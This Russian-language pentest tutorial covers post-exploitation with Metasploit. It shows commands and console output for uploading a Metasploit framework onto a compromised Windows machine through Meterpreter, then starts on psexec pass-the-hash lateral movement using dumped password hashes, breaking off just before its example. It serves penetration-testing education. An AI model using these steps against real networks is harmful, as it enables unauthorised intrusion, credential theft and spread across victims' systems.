После взлома.

После успешного взлома системы, что нам делать дальше? Нам нужен полный доступ к сети в которой находится эксплуатируемая система. Пентестер может «снифать» пакеты других потенциальных жертв, редактировать реестр для получения дополнительной информации или доступа, а также установить «бэкдор» для поддержания постоянного доступа к системе.
Использование этих техник позволит нам поддерживать определенный уровень доступа к системам и привести к более глубокому закреплению.

Metasploit в качестве полезной нагрузки.

Mubix с room362.com зарелизил сценарий, написанный на Ruby для загрузки Metasploit в уже скомпрометированную систему, это позволит запустить Metasploit с машины жертвы и продолжить эксплуатацию уязвимостей других машин. Есть много ситуаций, в которых это было бы чрезвычайно полезным, вы осуществляете удачный пентест удаленной системы и получаете доступ с Meterpreter консоли. Из консоли вы загружаете Metasploit в качестве полезной нагрузки и продолжаете эксплуатацию внутренней сети.
Для чего это нужно?
Для большей скрытности, для дальнейших соединений
Перво-наперво, вам потребуется загрузить Ruby сценарий и поместите его в папку плагинов.
Скачать deploymsf.rb можно отсюда http://www.offensive-security.com/msf/deploymsf.rb
Далее вам необходимо скачать версию Cygwin Metasploit Framework. Есть два варианта, весь Metasploit Framework или просто msfconsole. Плюсы и минусы - в размерах версий полезных нагрузок, 13 мегабайт в полной версии и 5 мегабайт в версии только с msfconsole.
Полная Metasploit Cygwin: https://metasploit.com/framework-3.3-dev.exe
Только msfconsole: https://metasploit.com/mini-3.3-dev.exe
При стандартных путях в Ruby сценариях, вам нужно переместить framework-3.3-dev.exe в /tmp/ вашей Linux машины или указать опцию "-d" к каталогу установщику Cygwin. Кроме того, отметим, что по умолчанию имя исполняемого файла - framework-3.3-dev.exe, если вы используете mini-3.3-dev.exe убедитесь, что вы используете "-f" опцию при указании имени файла.

root@bt4:/pentest/exploits/framework3/plugins# wget http://www.room362.com/tools/deploymsf.rb
--2009-06-27 12:10:05--  http://www.room362.com/tools/deploymsf.rb
Resolving www.room362.com... 66.197.106.2
Connecting to www.room362.com|66.197.106.2|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4227 (4.1K) [text/plain]
Saving to: `deploymsf.rb'
 
100%[======================================>] 4,227       --.-K/s   in 0.004s  
 
2009-06-27 12:10:05 (1.07 MB/s) - `deploymsf.rb' saved [4227/4227]

Теперь у нас все готово для работы с mini-3.3-dev.exe. Открываем консоль Meterpreter и выполняем несколько команд.

meterpreter > run deploymsf -f mini-3.3-dev.exe -d /tmp/
[*] Running Meterpreter MSFp Deployment Script…..
[*] Uploading MSFp for for deployment….
[*] MSFp uploaded as C:DOCUME~1bt4LOCALS~1Temp19211.exe
[*] Installing MSFp………..
[*] Done!
[*] Installation Complete!
[*] Running cygwin shell channelized…
[*] Channel 19 created – Type: interact 19 to play
[*] Be warned, it takes a bit for post setup to happen
[*] and you will not see a prompt, try pwd to check
meterpreter > interact 19
Interacting with channel 19…
 
[*] Configuring multi-user permissions for first run…
[*] Configuring the initial user environment…
pwd
/home/bt4
ls
msfconsole
*** Metasploit only has EXPERIMENTAL support for Ruby 1.9.1 and newer, things may break!
*** Please report bugs to msfdev[at]metasploit.com
[-] ***
[-] * WARNING: No database support: LoadError no such file to load — active_record
[-] ***
 
 
                |                    |      _) |   
 __ `__    _ __|  _` |  __| __   |  _   | __|
 |   |   |  __/ |   (   |__ |   | | (   | | |   
_|  _|  _|___|__|__,_|____/ .__/ _|___/ _|__|
                              _|   
 
 
=[ msf v3.3-dev
+ — –=[ 379 exploits – 231 payloads
+ — –=[ 20 encoders – 7 nops
=[ 156 aux
 
msf >

Теперь у нас есть полнофункциональный, интерактивный framework для работы на машинах наших жертв.

PSEXEC

Одним из мало известных модулей является модуль использования PSEXEC в Metasploit. Модуль psexec часто используется пентестерами как доступ к уже захваченной системе. Этот модуль был выпущен sysinternals, а затем интегрирован в framework. В результате проникновения используя какой нибудь эксплоит, можно воспользоваться meterpreter для перехвата паролей или воспользоваться другими методами, основанными на fgdump, pwdump, или cachedump с последующим использованием rainbow таблиц для взлома хешей.
У нас так же есть такой вариант, как передать хэш с помощью инструментов iam.exe. Один из методов использующих psexec в metasploit позволяет как ввести сам пароль, так и ввести хэш пароля без нужды взлома для доступа к системе. Давайте подумаем, как мы можем использовать эту атаку для проникновения в сеть. Давайте сперва договоримся о том, что система имеет пароль администратора, нам не нужно пытаться взломать его, потому что PsExec позволяет нам использовать только хэш-значения. Теперь мы можем переходить от системы к системе без нужды взлома пароля. Важно отметить, что при доступности только NTLM (в примере пароль более 15 символов ) просто замените ****NOPASSWORD**** на 32 ноля, как в примере: